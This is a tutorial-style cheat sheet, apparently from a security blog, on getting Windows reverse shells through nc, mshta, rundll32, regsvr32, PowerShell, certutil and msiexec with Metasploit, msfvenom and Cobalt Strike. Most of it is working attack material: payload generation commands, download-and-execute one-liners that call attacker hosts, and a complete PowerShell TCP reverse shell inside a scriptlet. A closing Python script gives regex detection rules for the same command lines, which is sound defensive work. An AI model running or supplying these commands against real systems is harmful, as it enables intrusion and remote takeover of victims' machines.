Windows Reverse Shell Methods

Reverse Shell Overview

Bind shell (forward shell)

Bind shell: the controller actively initiates the connection to the controlled host; nothing on the network path in between blocks it.


Reverse shell

Reverse shell: the controlled host actively initiates the connection back to the controller.

This is used because the controlled host usually cannot accept inbound packets normally: firewall restrictions, insufficient privileges, the port already being in use, and similar problems.


NC

NC bind shell


Controlled host: nc -lvvp 6666 -e cmd.exe
Controller: nc 192.168.247.131 6666
Principle: the controlled host binds cmd.exe to its local port 6666; the controller connects to port 6666 on the controlled host and obtains a shell.


NC reverse shell


Controller: nc -lvvp 7777
Controlled host: nc -e cmd.exe 192.168.1.105 7777
Principle: the controlled host redirects cmd.exe to port 7777 on the controller; the controller only needs to listen on its local port 7777 to obtain a shell.


Mshta

Mshta.exe is the Windows utility responsible for interpreting and running HTA (HTML Application) files; it executes HTML files that contain JavaScript or VBScript.

Metasploit HTA WebServer

Launching an HTA attack via Metasploit's HTA Web Server module

On the attacker machine:

msf6 > use exploit/windows/misc/hta_server
msf6 exploit(windows/misc/hta_server) > set srvhost 192.168.247.135
msf6 exploit(windows/misc/hta_server) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/misc/hta_server) > set target 1
msf6 exploit(windows/misc/hta_server) > run -j

URL of the generated HTA script: http://192.168.247.135:8080/Jzb785fYJBr.hta

On the target machine:
mshta http://192.168.247.135:8080/Jzb785fYJBr.hta

Generating an HTA script with Msfvenom

Generate a malicious HTA file with Msfvenom to launch the attack

On the attacker machine:

# msfvenom: generate the HTA script file

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.247.135 lport=4444 -f hta-psh -o 1.hta

# python3: start a web server to host the HTA script
python3 -m http.server

# python2: start a web server
python2 -m SimpleHTTPServer

In msfconsole, run:
msf6 > handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.247.135 -P 4444

On the target machine:
mshta.exe http://192.168.247.135:8000/1.hta

Generating an HTA script with Cobalt Strike

http://192.168.247.135:80/download/file.ext

Attacks > Packages > HTML Application > listener > PowerShell Method

Web Delivery > Host Files > select the generated evil.hta > produce the URL of the hosted file

Load and execute it with mshta; the host checks in to Cobalt Strike.

Rundll32

Rundll32.exe is part of the Windows operating system; it allows calling functions exported from a DLL (16-bit or 32-bit) and loads them into the appropriate memory space.

https://docs.microsoft.com/zh-cn/windows-server/administration/windowscommands/rundll32

Generating a DLL with Msfvenom and running it

Generate a reverse-shell DLL with Msfvenom to launch a Rundll32 attack
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.247.135 LPORT=5533 -f dll > abc.dll

handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.247.135 -P 5533
  • Local loading
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://192.168.247.135:8000/abc.dll',\"c:\abc.dll\")"

rundll32 shell32.dll,Control_RunDLL C:\abc.dll

  • Remote loading via an SMB share
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.247.135 lport=5555 -f dll -o abc.dll

impacket-smbserver dll /root/
rundll32.exe shell32.dll,Control_RunDLL \\192.168.247.135\dll\abc.dll

Metasploit SMB Delivery

Launching a Rundll32 attack via Metasploit's SMB Delivery module
use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.78.117
msf exploit(windows/smb/smb_delivery) > exploit -j

rundll32.exe \\192.168.78.117\GylDS\test.dll,0
  • Loading an HTA with Rundll32 for a reverse shell
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=139.155.49.43 lport=7777 -f hta-psh > 44.hta

bitsadmin /transfer shell http://139.155.49.43/44.hta C:\windows\temp\44.hta

rundll32.exe url.dll,OpenURL 44.hta

Generating a DLL with Cobalt Strike and running it

  • Generate the DLL

  • Run
rundll32 beacon.dll,StartW

Regsvr32

Regsvr32.exe is a command-line application provided by Windows for registering controls with the system or unregistering them, such as DLLs and ActiveX controls recorded in the Windows registry.
Regsvr32.exe is installed in the %systemroot%\System32 folder on Windows XP and later versions of Windows.

https://docs.microsoft.com/zh-cn/windows-server/administration/windowscommands/regsvr32

Syntax: Regsvr32 [/s] [/u] [/n] [/i[:cmdline]] <dllname>
/u - unregister the server
/i - call DllInstall, passing an optional [cmdline]; when used together with /u, it calls the DLL's uninstall routine
/n - do not call DllRegisterServer; this option must be used together with /i
/s - silent; do not display message boxes

Executing a local COM Scriptlet

  • Execute a local COM Scriptlet that launches the calculator
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>

Run:
regsvr32.exe /n /s /u /i:cmd.sct scrobj.dll
  • Execute a local COM Scriptlet to obtain a reverse shell
<?XML version="1.0"?>
<scriptlet>
<registration progid="PoC" classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >

<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run('powershell -w Hidden -c "$client = New-Object System.Net.Sockets.TCPClient(\'124.71.45.28\',10000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' +(pwd).Path + \'> \';$sendbyte =([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"');
]]>
</script>
</registration>
</scriptlet>

Run:
nc -lvvp 10000
regsvr32.exe /n /s /u /i:rev.sct scrobj.dll

Executing a remote COM Scriptlet

  • Execute a remote COM Scriptlet to obtain a reverse shell
nc -lvvp 10000
regsvr32.exe /n /s /u /i:http://10.42.0.1/rev.sct scrobj.dll

Metasploit Web Delivery

Launching Regsvr32 via Metasploit's Web Delivery module
use exploit/multi/script/web_delivery
msf exploit (web_delivery)> set srvhost 192.168.78.117
msf exploit (web_delivery)> set target 3
msf exploit (web_delivery)> set payload windows/x64/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.78.117
msf exploit (web_delivery)> exploit -j

regsvr32 /s /n /u /i:http://192.168.78.117:8080/NE67gb2mbfQt.sct scrobj.dll

Powershell

https://docs.microsoft.com/zh-cn/powershell/

https://www.freebuf.com/articles/web/220046.html

https://docs.microsoft.com/zh-cn/windows-server/administration/windowscommands/powershell

Common parameters explained

Invoke-Expression (alias IEX): executes a string as a command.
WindowStyle Hidden (-w Hidden): hides the window.
NonInteractive (-NonI): non-interactive mode; PowerShell does not present an interactive prompt to the user.
NoProfile (-NoP): the PowerShell console does not load the current user's profile.
NoExit (-NoE): does not exit the shell after execution.
EncodedCommand (-enc): accepts a base64-encoded string, avoiding some parsing problems.

Generating a PowerShell script with Msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=47.236.16.67 lport=9999 -f psh-reflection -o 9999.ps1
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://47.236.16.67:8000/9999.ps1');9999.ps1";

Loading Powercat from PowerShell

Powercat is a PowerShell-native backdoor listener and reverse shell tool, also described as a modified version of netcat, because it has built-in support for encoded payloads.
git clone https://github.com/besimorhino/powercat.git

python -m SimpleHTTPServer 8000

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://47.101.214.85:8000/powercat.ps1');powercat -c 47.101.214.85 -p 12345 -e cmd"

Metasploit Web Delivery

Reverse shell via Web Delivery
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
msf exploit(web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(web_delivery) > exploit -j

Launching an exe from PowerShell

  • Generate a malicious exe with Metasploit
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.78.117 LPORT=4445 -f exe -o 1.exe

python -m SimpleHTTPServer 8000

msf5 > handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.78.117 -P 4445
  • Download and execute with PowerShell
powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.78.117:8000/1.exe','1.exe');start 1.exe
powershell -ep bypass -nop -w hidden (new-object system.net.webclient).downloadfile('http://192.168.78.117:8000/1.exe','1.exe');start-process 1.exe

Launching Cscript from PowerShell

PowerShell lets the client run wsf, js and vbscript scripts by executing cscript.exe.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=139.155.49.43 LPORT=7777 -f vbs -o 3.vbs

# python2: start a web server
python -m SimpleHTTPServer 8000

# python3: start a web server
python3 -m http.server
msf5 > handler -p windows/x64/meterpreter/reverse_tcp -H 139.155.49.43 -P 7777

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://139.155.49.43:8000/3.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""

Launching a BAT file from PowerShell

PowerShell lets the client execute bat files.
msfvenom -p cmd/windows/powershell_reverse_tcp lhost=139.155.49.43 lport=8888 -o 1.bat

msf > handler -p cmd/windows/powershell_reverse_tcp -H 172.17.0.2 -P 8888

python -m SimpleHTTPServer 8000

powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('http://139.155.49.43:8000/1.bat'))"

Certutil

Certutil.exe is a command-line program installed as part of Certificate Services. We can use this tool to run a malicious exe on the target machine to obtain a meterpreter session.

https://docs.microsoft.com/zh-cn/windows-server/administration/windows-commands/certutil

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=139.155.49.43 lport=6666 -f exe >44.exe

# python2: start a web server

python2 -m SimpleHTTPServer 8000

# python3: start a web server

python3 -m http.server 8080

certutil.exe -urlcache -split -f http://139.155.49.43/44.exe c:\windows\temp\44.exe & start c:\windows\temp\44.exe

certutil.exe -urlcache -split -f http://139.155.49.43/44.exe delete

Cache file location:
%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content

Msiexec

  • Metasploit + msiexec

Windows ships with the Windows Installer engine; MSI packages are interpreted and installed by msiexec.exe.
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=139.155.49.43 lport=9999 -f msi >1.msi

python -m SimpleHTTPServer

msf > handler -p windows/x64/meterpreter/reverse_tcp -H 172.17.0.2 -P 9999

msiexec /q /i http://139.155.49.43:8000/1.msi
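As an added, defender-side illustration that is not part of the original post: the Mshta, Rundll32, Regsvr32, PowerShell, Certutil and Msiexec techniques above all leave a recognisable command-line footprint, and the following Python scans the CommandLine field of process-creation events (for example Sysmon Event ID 1 or Security 4688) for those patterns. The sample events, rule names and addresses are constructed for this example and are not from the page or from any real system.

```python
import re

# Constructed sample CommandLine values (not from the page or a real host).
# The first seven mirror the techniques described above; the last two are
# ordinary administrative uses that the rules should leave alone.
SAMPLE_EVENTS = [
    "mshta.exe http://192.0.2.10:8080/payload.hta",
    "rundll32.exe url.dll,OpenURL C:\\Windows\\Temp\\44.hta",
    "rundll32.exe shell32.dll,Control_RunDLL \\\\192.0.2.10\\share\\abc.dll",
    "regsvr32.exe /n /s /u /i:http://192.0.2.10/rev.sct scrobj.dll",
    "certutil.exe -urlcache -split -f http://192.0.2.10/44.exe C:\\Windows\\Temp\\44.exe",
    "msiexec.exe /q /i http://192.0.2.10:8000/1.msi",
    "powershell.exe -w hidden -exec bypass -c IEX((New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1'))",
    "regsvr32.exe /s C:\\Program Files\\Vendor\\component.dll",
    "msiexec.exe /i C:\\Users\\alice\\Downloads\\setup.msi",
]

# One rule per technique: (rule name, compiled regex over the full command line).
# Each rule requires the specific argument combination the technique needs
# (a URL, a UNC path, the /i: scriptlet switch with scrobj.dll, ...), so plain
# local use of the same binary does not fire.
RULES = [
    ("mshta_remote", re.compile(r"^mshta(\.exe)?\s+.*https?://", re.I)),
    ("rundll32_url_openurl", re.compile(r"^rundll32(\.exe)?\s+url\.dll,OpenURL", re.I)),
    ("rundll32_unc_dll", re.compile(r"^rundll32(\.exe)?\s+.*\\\\[^\s\\]+\\\S+\.dll", re.I)),
    ("regsvr32_scrobj_sct", re.compile(r"^regsvr32(\.exe)?\s+.*/i:\S+.*scrobj\.dll", re.I)),
    ("certutil_urlcache_download", re.compile(r"^certutil(\.exe)?\s+.*-urlcache\b.*https?://", re.I)),
    ("msiexec_remote_msi", re.compile(r"^msiexec(\.exe)?\s+.*/i\s+https?://", re.I)),
    ("powershell_iex_download", re.compile(r"^powershell(\.exe)?\s+.*(IEX|Invoke-Expression).*DownloadString", re.I)),
]


def classify(cmdline):
    """Return the names of every rule that matches one command line (empty if none)."""
    cmdline = cmdline.strip()
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(events):
    """Return (command line, matched rule names) for each event that matched at least one rule."""
    hits = []
    for event in events:
        names = classify(event)
        if names:
            hits.append((event, names))
    return hits


if __name__ == "__main__":
    for cmdline, names in scan(SAMPLE_EVENTS):
        print(", ".join(names), "<-", cmdline)
```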